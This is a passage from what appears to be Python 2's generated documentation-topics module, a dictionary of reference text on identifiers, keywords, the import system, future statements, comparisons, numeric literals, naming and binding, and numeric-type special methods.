detail:** The current implementation does not\nenforce the latter two restrictions, but programs should not abuse\nthis freedom, as future implementations may enforce them or silently\nchange the meaning of the program.\n\n**Programmer\'s note:** the "global" is a directive to the parser. It\napplies only to code parsed at the same time as the "global"\nstatement. In particular, a "global" statement contained in an "exec"\nstatement does not affect the code block *containing* the "exec"\nstatement, and code contained in an "exec" statement is unaffected by\n"global" statements in the code containing the "exec" statement. The\nsame applies to the "eval()", "execfile()" and "compile()" functions.\n', 'id-classes': u'\nReserved classes of identifiers\n*******************************\n\nCertain classes of identifiers (besides keywords) have special\nmeanings. These classes are identified by the patterns of leading and\ntrailing underscore characters:\n\n"_*"\n Not imported by "from module import *". The special identifier "_"\n is used in the interactive interpreter to store the result of the\n last evaluation; it is stored in the "__builtin__" module. When\n not in interactive mode, "_" has no special meaning and is not\n defined. See section The import statement.\n\n Note: The name "_" is often used in conjunction with\n internationalization; refer to the documentation for the\n "gettext" module for more information on this convention.\n\n"__*__"\n System-defined names. These names are defined by the interpreter\n and its implementation (including the standard library). Current\n system names are discussed in the Special method names section and\n elsewhere. More will likely be defined in future versions of\n Python. *Any* use of "__*__" names, in any context, that does not\n follow explicitly documented use, is subject to breakage without\n warning.\n\n"__*"\n Class-private names. Names in this category, when used within the\n context of a class definition, are re-written to use a mangled form\n to help avoid name clashes between "private" attributes of base and\n derived classes. See section Identifiers (Names).\n', 'identifiers': u'\nIdentifiers and keywords\n************************\n\nIdentifiers (also referred to as *names*) are described by the\nfollowing lexical definitions:\n\n identifier ::= (letter|"_") (letter | digit | "_")*\n letter ::= lowercase | uppercase\n lowercase ::= "a"..."z"\n uppercase ::= "A"..."Z"\n digit ::= "0"..."9"\n\nIdentifiers are unlimited in length. Case is significant.\n\n\nKeywords\n========\n\nThe following identifiers are used as reserved words, or *keywords* of\nthe language, and cannot be used as ordinary identifiers. They must\nbe spelled exactly as written here:\n\n and del from not while\n as elif global or with\n assert else if pass yield\n break except import print\n class exec in raise\n continue finally is return\n def for lambda try\n\nChanged in version 2.4: "None" became a constant and is now recognized\nby the compiler as a name for the built-in object "None". Although it\nis not a keyword, you cannot assign a different object to it.\n\nChanged in version 2.5: Using "as" and "with" as identifiers triggers\na warning. To use them as keywords, enable the "with_statement"\nfuture feature .\n\nChanged in version 2.6: "as" and "with" are full keywords.\n\n\nReserved classes of identifiers\n===============================\n\nCertain classes of identifiers (besides keywords) have special\nmeanings. These classes are identified by the patterns of leading and\ntrailing underscore characters:\n\n"_*"\n Not imported by "from module import *". The special identifier "_"\n is used in the interactive interpreter to store the result of the\n last evaluation; it is stored in the "__builtin__" module. When\n not in interactive mode, "_" has no special meaning and is not\n defined. See section The import statement.\n\n Note: The name "_" is often used in conjunction with\n internationalization; refer to the documentation for the\n "gettext" module for more information on this convention.\n\n"__*__"\n System-defined names. These names are defined by the interpreter\n and its implementation (including the standard library). Current\n system names are discussed in the Special method names section and\n elsewhere. More will likely be defined in future versions of\n Python. *Any* use of "__*__" names, in any context, that does not\n follow explicitly documented use, is subject to breakage without\n warning.\n\n"__*"\n Class-private names. Names in this category, when used within the\n context of a class definition, are re-written to use a mangled form\n to help avoid name clashes between "private" attributes of base and\n derived classes. See section Identifiers (Names).\n', 'if': u'\nThe "if" statement\n******************\n\nThe "if" statement is used for conditional execution:\n\n if_stmt ::= "if" expression ":" suite\n ( "elif" expression ":" suite )*\n ["else" ":" suite]\n\nIt selects exactly one of the suites by evaluating the expressions one\nby one until one is found to be true (see section Boolean operations\nfor the definition of true and false); then that suite is executed\n(and no other part of the "if" statement is executed or evaluated).\nIf all expressions are false, the suite of the "else" clause, if\npresent, is executed.\n', 'imaginary': u'\nImaginary literals\n******************\n\nImaginary literals are described by the following lexical definitions:\n\n imagnumber ::= (floatnumber | intpart) ("j" | "J")\n\nAn imaginary literal yields a complex number with a real part of 0.0.\nComplex numbers are represented as a pair of floating point numbers\nand have the same restrictions on their range. To create a complex\nnumber with a nonzero real part, add a floating point number to it,\ne.g., "(3+4j)". Some examples of imaginary literals:\n\n 3.14j 10.j 10j .001j 1e100j 3.14e-10j\n', 'import': u'\nThe "import" statement\n**********************\n\n import_stmt ::= "import" module ["as" name] ( "," module ["as" name] )*\n | "from" relative_module "import" identifier ["as" name]\n ( "," identifier ["as" name] )*\n | "from" relative_module "import" "(" identifier ["as" name]\n ( "," identifier ["as" name] )* [","] ")"\n | "from" module "import" "*"\n module ::= (identifier ".")* identifier\n relative_module ::= "."* module | "."+\n name ::= identifier\n\nImport statements are executed in two steps: (1) find a module, and\ninitialize it if necessary; (2) define a name or names in the local\nnamespace (of the scope where the "import" statement occurs). The\nstatement comes in two forms differing on whether it uses the "from"\nkeyword. The first form (without "from") repeats these steps for each\nidentifier in the list. The form with "from" performs step (1) once,\nand then performs step (2) repeatedly.\n\nTo understand how step (1) occurs, one must first understand how\nPython handles hierarchical naming of modules. To help organize\nmodules and provide a hierarchy in naming, Python has a concept of\npackages. A package can contain other packages and modules while\nmodules cannot contain other modules or packages. From a file system\nperspective, packages are directories and modules are files.\n\nOnce the name of the module is known (unless otherwise specified, the\nterm "module" will refer to both packages and modules), searching for\nthe module or package can begin. The first place checked is\n"sys.modules", the cache of all modules that have been imported\npreviously. If the module is found there then it is used in step (2)\nof import.\n\nIf the module is not found in the cache, then "sys.meta_path" is\nsearched (the specification for "sys.meta_path" can be found in **PEP\n302**). The object is a list of *finder* objects which are queried in\norder as to whether they know how to load the module by calling their\n"find_module()" method with the name of the module. If the module\nhappens to be contained within a package (as denoted by the existence\nof a dot in the name), then a second argument to "find_module()" is\ngiven as the value of the "__path__" attribute from the parent package\n(everything up to the last dot in the name of the module being\nimported). If a finder can find the module it returns a *loader*\n(discussed later) or returns "None".\n\nIf none of the finders on "sys.meta_path" are able to find the module\nthen some implicitly defined finders are queried. Implementations of\nPython vary in what implicit meta path finders are defined. The one\nthey all do define, though, is one that handles "sys.path_hooks",\n"sys.path_importer_cache", and "sys.path".\n\nThe implicit finder searches for the requested module in the "paths"\nspecified in one of two places ("paths" do not have to be file system\npaths). If the module being imported is supposed to be contained\nwithin a package then the second argument passed to "find_module()",\n"__path__" on the parent package, is used as the source of paths. If\nthe module is not contained in a package then "sys.path" is used as\nthe source of paths.\n\nOnce the source of paths is chosen it is iterated over to find a\nfinder that can handle that path. The dict at\n"sys.path_importer_cache" caches finders for paths and is checked for\na finder. If the path does not have a finder cached then\n"sys.path_hooks" is searched by calling each object in the list with a\nsingle argument of the path, returning a finder or raises\n"ImportError". If a finder is returned then it is cached in\n"sys.path_importer_cache" and then used for that path entry. If no\nfinder can be found but the path exists then a value of "None" is\nstored in "sys.path_importer_cache" to signify that an implicit, file-\nbased finder that handles modules stored as individual files should be\nused for that path. If the path does not exist then a finder which\nalways returns "None" is placed in the cache for the path.\n\nIf no finder can find the module then "ImportError" is raised.\nOtherwise some finder returned a loader whose "load_module()" method\nis called with the name of the module to load (see **PEP 302** for the\noriginal definition of loaders). A loader has several responsibilities\nto perform on a module it loads. First, if the module already exists\nin "sys.modules" (a possibility if the loader is called outside of the\nimport machinery) then it is to use that module for initialization and\nnot a new module. But if the module does not exist in "sys.modules"\nthen it is to be added to that dict before initialization begins. If\nan error occurs during loading of the module and it was added to\n"sys.modules" it is to be removed from the dict. If an error occurs\nbut the module was already in "sys.modules" it is left in the dict.\n\nThe loader must set several attributes on the module. "__name__" is to\nbe set to the name of the module. "__file__" is to be the "path" to\nthe file unless the module is built-in (and thus listed in\n"sys.builtin_module_names") in which case the attribute is not set. If\nwhat is being imported is a package then "__path__" is to be set to a\nlist of paths to be searched when looking for modules and packages\ncontained within the package being imported. "__package__" is optional\nbut should be set to the name of package that contains the module or\npackage (the empty string is used for module not contained in a\npackage). "__loader__" is also optional but should be set to the\nloader object that is loading the module.\n\nIf an error occurs during loading then the loader raises "ImportError"\nif some other exception is not already being propagated. Otherwise the\nloader returns the module that was loaded and initialized.\n\nWhen step (1) finishes without raising an exception, step (2) can\nbegin.\n\nThe first form of "import" statement binds the module name in the\nlocal namespace to the module object, and then goes on to import the\nnext identifier, if any. If the module name is followed by "as", the\nname following "as" is used as the local name for the module.\n\nThe "from" form does not bind the module name: it goes through the\nlist of identifiers, looks each one of them up in the module found in\nstep (1), and binds the name in the local namespace to the object thus\nfound. As with the first form of "import", an alternate local name\ncan be supplied by specifying ""as" localname". If a name is not\nfound, "ImportError" is raised. If the list of identifiers is\nreplaced by a star ("\'*\'"), all public names defined in the module are\nbound in the local namespace of the "import" statement..\n\nThe *public names* defined by a module are determined by checking the\nmodule\'s namespace for a variable named "__all__"; if defined, it must\nbe a sequence of strings which are names defined or imported by that\nmodule. The names given in "__all__" are all considered public and\nare required to exist. If "__all__" is not defined, the set of public\nnames includes all names found in the module\'s namespace which do not\nbegin with an underscore character ("\'_\'"). "__all__" should contain\nthe entire public API. It is intended to avoid accidentally exporting\nitems that are not part of the API (such as library modules which were\nimported and used within the module).\n\nThe "from" form with "*" may only occur in a module scope. If the\nwild card form of import --- "import *" --- is used in a function and\nthe function contains or is a nested block with free variables, the\ncompiler will raise a "SyntaxError".\n\nWhen specifying what module to import you do not have to specify the\nabsolute name of the module. When a module or package is contained\nwithin another package it is possible to make a relative import within\nthe same top package without having to mention the package name. By\nusing leading dots in the specified module or package after "from" you\ncan specify how high to traverse up the current package hierarchy\nwithout specifying exact names. One leading dot means the current\npackage where the module making the import exists. Two dots means up\none package level. Three dots is up two levels, etc. So if you execute\n"from . import mod" from a module in the "pkg" package then you will\nend up importing "pkg.mod". If you execute "from ..subpkg2 import mod"\nfrom within "pkg.subpkg1" you will import "pkg.subpkg2.mod". The\nspecification for relative imports is contained within **PEP 328**.\n\n"importlib.import_module()" is provided to support applications that\ndetermine which modules need to be loaded dynamically.\n\n\nFuture statements\n=================\n\nA *future statement* is a directive to the compiler that a particular\nmodule should be compiled using syntax or semantics that will be\navailable in a specified future release of Python. The future\nstatement is intended to ease migration to future versions of Python\nthat introduce incompatible changes to the language. It allows use of\nthe new features on a per-module basis before the release in which the\nfeature becomes standard.\n\n future_statement ::= "from" "__future__" "import" feature ["as" name]\n ("," feature ["as" name])*\n | "from" "__future__" "import" "(" feature ["as" name]\n ("," feature ["as" name])* [","] ")"\n feature ::= identifier\n name ::= identifier\n\nA future statement must appear near the top of the module. The only\nlines that can appear before a future statement are:\n\n* the module docstring (if any),\n\n* comments,\n\n* blank lines, and\n\n* other future statements.\n\nThe features recognized by Python 2.6 are "unicode_literals",\n"print_function", "absolute_import", "division", "generators",\n"nested_scopes" and "with_statement". "generators", "with_statement",\n"nested_scopes" are redundant in Python version 2.6 and above because\nthey are always enabled.\n\nA future statement is recognized and treated specially at compile\ntime: Changes to the semantics of core constructs are often\nimplemented by generating different code. It may even be the case\nthat a new feature introduces new incompatible syntax (such as a new\nreserved word), in which case the compiler may need to parse the\nmodule differently. Such decisions cannot be pushed off until\nruntime.\n\nFor any given release, the compiler knows which feature names have\nbeen defined, and raises a compile-time error if a future statement\ncontains a feature not known to it.\n\nThe direct runtime semantics are the same as for any import statement:\nthere is a standard module "__future__", described later, and it will\nbe imported in the usual way at the time the future statement is\nexecuted.\n\nThe interesting runtime semantics depend on the specific feature\nenabled by the future statement.\n\nNote that there is nothing special about the statement:\n\n import __future__ [as name]\n\nThat is not a future statement; it\'s an ordinary import statement with\nno special semantics or syntax restrictions.\n\nCode compiled by an "exec" statement or calls to the built-in\nfunctions "compile()" and "execfile()" that occur in a module "M"\ncontaining a future statement will, by default, use the new syntax or\nsemantics associated with the future statement. This can, starting\nwith Python 2.2 be controlled by optional arguments to "compile()" ---\nsee the documentation of that function for details.\n\nA future statement typed at an interactive interpreter prompt will\ntake effect for the rest of the interpreter session. If an\ninterpreter is started with the "-i" option, is passed a script name\nto execute, and the script includes a future statement, it will be in\neffect in the interactive session started after the script is\nexecuted.\n\nSee also:\n\n **PEP 236** - Back to the __future__\n The original proposal for the __future__ mechanism.\n', 'in': u'\nComparisons\n***********\n\nUnlike C, all comparison operations in Python have the same priority,\nwhich is lower than that of any arithmetic, shifting or bitwise\noperation. Also unlike C, expressions like "a < b < c" have the\ninterpretation that is conventional in mathematics:\n\n comparison ::= or_expr ( comp_operator or_expr )*\n comp_operator ::= "<" | ">" | "==" | ">=" | "<=" | "<>" | "!="\n | "is" ["not"] | ["not"] "in"\n\nComparisons yield boolean values: "True" or "False".\n\nComparisons can be chained arbitrarily, e.g., "x < y <= z" is\nequivalent to "x < y and y <= z", except that "y" is evaluated only\nonce (but in both cases "z" is not evaluated at all when "x < y" is\nfound to be false).\n\nFormally, if *a*, *b*, *c*, ..., *y*, *z* are expressions and *op1*,\n*op2*, ..., *opN* are comparison operators, then "a op1 b op2 c ... y\nopN z" is equivalent to "a op1 b and b op2 c and ... y opN z", except\nthat each expression is evaluated at most once.\n\nNote that "a op1 b op2 c" doesn\'t imply any kind of comparison between\n*a* and *c*, so that, e.g., "x < y > z" is perfectly legal (though\nperhaps not pretty).\n\nThe forms "<>" and "!=" are equivalent; for consistency with C, "!="\nis preferred; where "!=" is mentioned below "<>" is also accepted.\nThe "<>" spelling is considered obsolescent.\n\nThe operators "<", ">", "==", ">=", "<=", and "!=" compare the values\nof two objects. The objects need not have the same type. If both are\nnumbers, they are converted to a common type. Otherwise, objects of\ndifferent types *always* compare unequal, and are ordered consistently\nbut arbitrarily. You can control comparison behavior of objects of\nnon-built-in types by defining a "__cmp__" method or rich comparison\nmethods like "__gt__", described in section Special method names.\n\n(This unusual definition of comparison was used to simplify the\ndefinition of operations like sorting and the "in" and "not in"\noperators. In the future, the comparison rules for objects of\ndifferent types are likely to change.)\n\nComparison of objects of the same type depends on the type:\n\n* Numbers are compared arithmetically.\n\n* Strings are compared lexicographically using the numeric\n equivalents (the result of the built-in function "ord()") of their\n characters. Unicode and 8-bit strings are fully interoperable in\n this behavior. [4]\n\n* Tuples and lists are compared lexicographically using comparison\n of corresponding elements. This means that to compare equal, each\n element must compare equal and the two sequences must be of the same\n type and have the same length.\n\n If not equal, the sequences are ordered the same as their first\n differing elements. For example, "cmp([1,2,x], [1,2,y])" returns\n the same as "cmp(x,y)". If the corresponding element does not\n exist, the shorter sequence is ordered first (for example, "[1,2] <\n [1,2,3]").\n\n* Mappings (dictionaries) compare equal if and only if their sorted\n (key, value) lists compare equal. [5] Outcomes other than equality\n are resolved consistently, but are not otherwise defined. [6]\n\n* Most other objects of built-in types compare unequal unless they\n are the same object; the choice whether one object is considered\n smaller or larger than another one is made arbitrarily but\n consistently within one execution of a program.\n\nThe operators "in" and "not in" test for collection membership. "x in\ns" evaluates to true if *x* is a member of the collection *s*, and\nfalse otherwise. "x not in s" returns the negation of "x in s". The\ncollection membership test has traditionally been bound to sequences;\nan object is a member of a collection if the collection is a sequence\nand contains an element equal to that object. However, it make sense\nfor many other object types to support membership tests without being\na sequence. In particular, dictionaries (for keys) and sets support\nmembership testing.\n\nFor the list and tuple types, "x in y" is true if and only if there\nexists an index *i* such that "x == y[i]" is true.\n\nFor the Unicode and string types, "x in y" is true if and only if *x*\nis a substring of *y*. An equivalent test is "y.find(x) != -1".\nNote, *x* and *y* need not be the same type; consequently, "u\'ab\' in\n\'abc\'" will return "True". Empty strings are always considered to be a\nsubstring of any other string, so """ in "abc"" will return "True".\n\nChanged in version 2.3: Previously, *x* was required to be a string of\nlength "1".\n\nFor user-defined classes which define the "__contains__()" method, "x\nin y" is true if and only if "y.__contains__(x)" is true.\n\nFor user-defined classes which do not define "__contains__()" but do\ndefine "__iter__()", "x in y" is true if some value "z" with "x == z"\nis produced while iterating over "y". If an exception is raised\nduring the iteration, it is as if "in" raised that exception.\n\nLastly, the old-style iteration protocol is tried: if a class defines\n"__getitem__()", "x in y" is true if and only if there is a non-\nnegative integer index *i* such that "x == y[i]", and all lower\ninteger indices do not raise "IndexError" exception. (If any other\nexception is raised, it is as if "in" raised that exception).\n\nThe operator "not in" is defined to have the inverse true value of\n"in".\n\nThe operators "is" and "is not" test for object identity: "x is y" is\ntrue if and only if *x* and *y* are the same object. "x is not y"\nyields the inverse truth value. [7]\n', 'integers': u'\nInteger and long integer literals\n*********************************\n\nInteger and long integer literals are described by the following\nlexical definitions:\n\n longinteger ::= integer ("l" | "L")\n integer ::= decimalinteger | octinteger | hexinteger | bininteger\n decimalinteger ::= nonzerodigit digit* | "0"\n octinteger ::= "0" ("o" | "O") octdigit+ | "0" octdigit+\n hexinteger ::= "0" ("x" | "X") hexdigit+\n bininteger ::= "0" ("b" | "B") bindigit+\n nonzerodigit ::= "1"..."9"\n octdigit ::= "0"..."7"\n bindigit ::= "0" | "1"\n hexdigit ::= digit | "a"..."f" | "A"..."F"\n\nAlthough both lower case "\'l\'" and upper case "\'L\'" are allowed as\nsuffix for long integers, it is strongly recommended to always use\n"\'L\'", since the letter "\'l\'" looks too much like the digit "\'1\'".\n\nPlain integer literals that are above the largest representable plain\ninteger (e.g., 2147483647 when using 32-bit arithmetic) are accepted\nas if they were long integers instead. [1] There is no limit for long\ninteger literals apart from what can be stored in available memory.\n\nSome examples of plain integer literals (first row) and long integer\nliterals (second and third rows):\n\n 7 2147483647 0177\n 3L 79228162514264337593543950336L 0377L 0x100000000L\n 79228162514264337593543950336 0xdeadbeef\n', 'lambda': u'\nLambdas\n*******\n\n lambda_expr ::= "lambda" [parameter_list]: expression\n old_lambda_expr ::= "lambda" [parameter_list]: old_expression\n\nLambda expressions (sometimes called lambda forms) have the same\nsyntactic position as expressions. They are a shorthand to create\nanonymous functions; the expression "lambda arguments: expression"\nyields a function object. The unnamed object behaves like a function\nobject defined with\n\n def name(arguments):\n return expression\n\nSee section Function definitions for the syntax of parameter lists.\nNote that functions created with lambda expressions cannot contain\nstatements.\n', 'lists': u'\nList displays\n*************\n\nA list display is a possibly empty series of expressions enclosed in\nsquare brackets:\n\n list_display ::= "[" [expression_list | list_comprehension] "]"\n list_comprehension ::= expression list_for\n list_for ::= "for" target_list "in" old_expression_list [list_iter]\n old_expression_list ::= old_expression [("," old_expression)+ [","]]\n old_expression ::= or_test | old_lambda_expr\n list_iter ::= list_for | list_if\n list_if ::= "if" old_expression [list_iter]\n\nA list display yields a new list object. Its contents are specified\nby providing either a list of expressions or a list comprehension.\nWhen a comma-separated list of expressions is supplied, its elements\nare evaluated from left to right and placed into the list object in\nthat order. When a list comprehension is supplied, it consists of a\nsingle expression followed by at least one "for" clause and zero or\nmore "for" or "if" clauses. In this case, the elements of the new\nlist are those that would be produced by considering each of the "for"\nor "if" clauses a block, nesting from left to right, and evaluating\nthe expression to produce a list element each time the innermost block\nis reached [1].\n', 'naming': u'\nNaming and binding\n******************\n\n*Names* refer to objects. Names are introduced by name binding\noperations. Each occurrence of a name in the program text refers to\nthe *binding* of that name established in the innermost function block\ncontaining the use.\n\nA *block* is a piece of Python program text that is executed as a\nunit. The following are blocks: a module, a function body, and a class\ndefinition. Each command typed interactively is a block. A script\nfile (a file given as standard input to the interpreter or specified\non the interpreter command line the first argument) is a code block.\nA script command (a command specified on the interpreter command line\nwith the \'**-c**\' option) is a code block. The file read by the\nbuilt-in function "execfile()" is a code block. The string argument\npassed to the built-in function "eval()" and to the "exec" statement\nis a code block. The expression read and evaluated by the built-in\nfunction "input()" is a code block.\n\nA code block is executed in an *execution frame*. A frame contains\nsome administrative information (used for debugging) and determines\nwhere and how execution continues after the code block\'s execution has\ncompleted.\n\nA *scope* defines the visibility of a name within a block. If a local\nvariable is defined in a block, its scope includes that block. If the\ndefinition occurs in a function block, the scope extends to any blocks\ncontained within the defining one, unless a contained block introduces\na different binding for the name. The scope of names defined in a\nclass block is limited to the class block; it does not extend to the\ncode blocks of methods -- this includes generator expressions since\nthey are implemented using a function scope. This means that the\nfollowing will fail:\n\n class A:\n a = 42\n b = list(a + i for i in range(10))\n\nWhen a name is used in a code block, it is resolved using the nearest\nenclosing scope. The set of all such scopes visible to a code block\nis called the block\'s *environment*.\n\nIf a name is bound in a block, it is a local variable of that block.\nIf a name is bound at the module level, it is a global variable. (The\nvariables of the module code block are local and global.) If a\nvariable is used in a code block but not defined there, it is a *free\nvariable*.\n\nWhen a name is not found at all, a "NameError" exception is raised.\nIf the name refers to a local variable that has not been bound, a\n"UnboundLocalError" exception is raised. "UnboundLocalError" is a\nsubclass of "NameError".\n\nThe following constructs bind names: formal parameters to functions,\n"import" statements, class and function definitions (these bind the\nclass or function name in the defining block), and targets that are\nidentifiers if occurring in an assignment, "for" loop header, in the\nsecond position of an "except" clause header or after "as" in a "with"\nstatement. The "import" statement of the form "from ... import *"\nbinds all names defined in the imported module, except those beginning\nwith an underscore. This form may only be used at the module level.\n\nA target occurring in a "del" statement is also considered bound for\nthis purpose (though the actual semantics are to unbind the name). It\nis illegal to unbind a name that is referenced by an enclosing scope;\nthe compiler will report a "SyntaxError".\n\nEach assignment or import statement occurs within a block defined by a\nclass or function definition or at the module level (the top-level\ncode block).\n\nIf a name binding operation occurs anywhere within a code block, all\nuses of the name within the block are treated as references to the\ncurrent block. This can lead to errors when a name is used within a\nblock before it is bound. This rule is subtle. Python lacks\ndeclarations and allows name binding operations to occur anywhere\nwithin a code block. The local variables of a code block can be\ndetermined by scanning the entire text of the block for name binding\noperations.\n\nIf the global statement occurs within a block, all uses of the name\nspecified in the statement refer to the binding of that name in the\ntop-level namespace. Names are resolved in the top-level namespace by\nsearching the global namespace, i.e. the namespace of the module\ncontaining the code block, and the builtins namespace, the namespace\nof the module "__builtin__". The global namespace is searched first.\nIf the name is not found there, the builtins namespace is searched.\nThe global statement must precede all uses of the name.\n\nThe builtins namespace associated with the execution of a code block\nis actually found by looking up the name "__builtins__" in its global\nnamespace; this should be a dictionary or a module (in the latter case\nthe module\'s dictionary is used). By default, when in the "__main__"\nmodule, "__builtins__" is the built-in module "__builtin__" (note: no\n\'s\'); when in any other module, "__builtins__" is an alias for the\ndictionary of the "__builtin__" module itself. "__builtins__" can be\nset to a user-created dictionary to create a weak form of restricted\nexecution.\n\n**CPython implementation detail:** Users should not touch\n"__builtins__"; it is strictly an implementation detail. Users\nwanting to override values in the builtins namespace should "import"\nthe "__builtin__" (no \'s\') module and modify its attributes\nappropriately.\n\nThe namespace for a module is automatically created the first time a\nmodule is imported. The main module for a script is always called\n"__main__".\n\nThe "global" statement has the same scope as a name binding operation\nin the same block. If the nearest enclosing scope for a free variable\ncontains a global statement, the free variable is treated as a global.\n\nA class definition is an executable statement that may use and define\nnames. These references follow the normal rules for name resolution.\nThe namespace of the class definition becomes the attribute dictionary\nof the class. Names defined at the class scope are not visible in\nmethods.\n\n\nInteraction with dynamic features\n=================================\n\nThere are several cases where Python statements are illegal when used\nin conjunction with nested scopes that contain free variables.\n\nIf a variable is referenced in an enclosing scope, it is illegal to\ndelete the name. An error will be reported at compile time.\n\nIf the wild card form of import --- "import *" --- is used in a\nfunction and the function contains or is a nested block with free\nvariables, the compiler will raise a "SyntaxError".\n\nIf "exec" is used in a function and the function contains or is a\nnested block with free variables, the compiler will raise a\n"SyntaxError" unless the exec explicitly specifies the local namespace\nfor the "exec". (In other words, "exec obj" would be illegal, but\n"exec obj in ns" would be legal.)\n\nThe "eval()", "execfile()", and "input()" functions and the "exec"\nstatement do not have access to the full environment for resolving\nnames. Names may be resolved in the local and global namespaces of\nthe caller. Free variables are not resolved in the nearest enclosing\nnamespace, but in the global namespace. [1] The "exec" statement and\nthe "eval()" and "execfile()" functions have optional arguments to\noverride the global and local namespace. If only one namespace is\nspecified, it is used for both.\n', 'numbers': u'\nNumeric literals\n****************\n\nThere are four types of numeric literals: plain integers, long\nintegers, floating point numbers, and imaginary numbers. There are no\ncomplex literals (complex numbers can be formed by adding a real\nnumber and an imaginary number).\n\nNote that numeric literals do not include a sign; a phrase like "-1"\nis actually an expression composed of the unary operator \'"-"\' and the\nliteral "1".\n', 'numeric-types': u'\nEmulating numeric types\n***********************\n\nThe following methods can be defined to emulate numeric objects.\nMethods corresponding to operations that are not supported by the\nparticular kind of number implemented (e.g., bitwise operations for\nnon-integral numbers) should be left undefined.\n\nobject.__add__(self, other)\nobject.__sub__(self, other)\nobject.__mul__(self, other)\nobject.__floordiv__(self, other)\nobject.__mod__(self, other)\nobject.__divmod__(self, other)\nobject.__pow__(self, other[, modulo])\nobject.__lshift__(self, other)\nobject.__rshift__(self, other)\nobject.__and__(self, other)\nobject.__xor__(self, other)\nobject.__or__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "//", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|"). For instance, to evaluate the\n expression "x + y", where *x* is an instance of a class that has an\n "__add__()" method, "x.__add__(y)" is called. The "__divmod__()"\n method should be the equivalent to using "__floordiv__()" and\n "__mod__()"; it should not be related to "__truediv__()" (described\n below). Note that "__pow__()" should be defined to accept an\n optional third argument if the ternary version of the built-in\n "pow()" function is to be supported.\n\n If one of those methods does not support the operation with the\n supplied arguments, it should return "NotImplemented".\n\nobject.__div__(self, other)\nobject.__truediv__(self, other)\n\n The division operator ("/") is implemented by these methods. The\n "__truediv__()" method is used when "__future__.division" is in\n effect, otherwise "__div__()" is used. If only one of these two\n methods is defined, the object will not support division in the\n alternate context; "TypeError" will be raised instead.\n\nobject.__radd__(self, other)\nobject.__rsub__(self, other)\nobject.__rmul__(self, other)\nobject.__rdiv__(self, other)\nobject.__rtruediv__(self, other)\nobject.__rfloordiv__(self, other)\nobject.__rmod__(self, other)\nobject.__rdivmod__(self, other)\nobject.__rpow__(self, other)\nobject.__rlshift__(self, other)\nobject.__rrshift__(self, other)\nobject.__rand__(self, other)\nobject.__rxor__(self, other)\nobject.__ror__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "/", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|") with reflected (swapped) operands.\n These functions are only called if the left operand does not\n support the corresponding operation and the operands are of\n different types. [2] For instance, to evaluate the expression "x -\n y", where *y* is an instance of a class that has an "__rsub__()"\n method, "y.__rsub__(x)" is called if "x.__sub__(y)" returns\n *NotImplemented*.\n\n Note that ternary "pow()" will not try calling "__rpow__()" (the\n coercion rules would become too complicated).\n\n Note: If the right operand\'s type is a subclass of the left\n operand\'s type and that subclass provides the reflected method\n for the operation, this method will be called before the left\n operand\'s non-reflected method. This behavior allows subclasses\n to override their ancestors\' operations.\n\nobject.__iadd__(self, other)\nobject.__isub__(self, other)\nobject.__imul__(self, other)\nobject.__idiv__(self, other)\nobject.__itruediv__(self, other)\nobject.__ifloordiv__(self, other)\nobject.__imod__(self, other)\nobject.__ipow__(self, other[, modulo])\nobject.__ilshift__(self, other)\nobject.__irshift__(self, other)\nobject.__iand__(self, other)\nobject.__ixor__(self, other)\nobject.__ior__(self, other)\n\n These methods are called to implement the augmented arithmetic\n assignments ("+=", "-=", "*=", "/=", "//=", "%=", "**=", "<<=",\n ">>=", "&=", "^=", "|="). These methods should attempt to do the\n operation in-place (modifying *self*) and return the result (which\n could be, but does not have to be, *self*). If a specific method\n is not defined, the augmented assignment falls back to the normal\n methods. For instance, to execute the statement "x += y", where\n *x* is an instance of a class that has an "__iadd__()" method,\n "x.__iadd__(y)" is called. If *x* is an instance of a class that\n does not define a "__iadd__()" method, "x.__add__(y)" and\n "y.__radd__(x)" are considered, as with the evaluation of "x + y".\n\nobject.__neg__(self)\nobject.__pos__(self)\nobject.__abs__(self)\nobject.__invert__(self)\n\n Called to implement the unary arithmetic operations ("-", "+",\n "abs()" and "~").\n\nobject.__complex__(self)\nobject.__int__(self)\nobject.__long__(self)\nobject.__float__(self)\n\n Called to implement the built-in functions "complex()", "int()",\n "long()", and "float()". Should return a value of the appropriate\n type.\n\nobject.__oct__(self)\nobject.__hex__(self)\n\n Called to implement the built-in functions "oct()" and "hex()".\n Should return a string value.\n\nobject.__index__(self)\n\n Called to implement "operator.index()". Also called whenever\n Python needs an integer object (such as in slicing). Must return\n an integer (int or long).\n\n New in version 2.5.\n\nobject.__coerce__(self, other)\n\n Called to implement "mixed-mode" numeric arithmetic. Should either\n return a 2-tuple containing *self* and *other* converted to a\n common numeric type, or "None" if conversion is impossible. When\n the common type would be the type of "other", it is sufficient to\n return "None", since the interpreter will also ask the other object\n to attempt a coercion (but sometimes, if the implementation of the\n other type cannot be changed, it is useful to do the conversion to\n the other type here). A return value of "NotImplemented" is\n equivalent to returning "None".\n', 'objects': u'\nObjects, values and types\n*************************\n\n*Objects* are Python\'s abstraction for data. All data in a Python\nprogram is represented by objects or by relations between objects. (In\na sense, and in conformance to Von Neumann\'s model of a "stored\nprogram computer," code is also represented by objects.)\n\nEvery object has an identity, a type and a value. An object\'s\n*identity* never changes once it has been created; you may think of it\nas the object\'s address in memory. The \'"is"\' operator compares the\nidentity of two objects; the "id()" function returns an integer\nrepresenting its identity (currently implemented as its address). An\nobject\'s *type* is also unchangeable. [1] An object\'s type determines\nthe operations that the object supports (e.g., "does it have a\nlength?") and also defines the possible values for objects of that\ntype. The "type()" function returns an object\'s type (which is an\nobject itself). The *value* of some objects can change. Objects\nwhose value can change are said to be *mutable*; objects whose value\nis unchangeable once they are created are called *immutable*. (The\nvalue of an immutable container object that contains a reference to a\nmutable object can change when the latter\'s value is changed; however\nthe container is still considered immutable, because the collection of\nobjects it contains cannot be changed. So, immutability is not\nstrictly the same as having an unchangeable value, it is more subtle.)\nAn object\'s mutability is determined by its type; for instance,\nnumbers, strings and tuples are immutable, while dictionaries and\nlists are mutable.\n\nObjects are never explicitly destroyed; however, when they become\nunreachable they may be garbage-collected. An implementation is\nallowed to postpone garbage collection or omit it altogether --- it is\na matter of implementation quality how garbage collection is\nimplemented, as long as no objects are collected that are still\nreachable.\n\n**CPython implementation detail:** CPython currently uses a reference-\ncounting scheme with (optional) delayed detection of cyclically linked\ngarbage, which collects 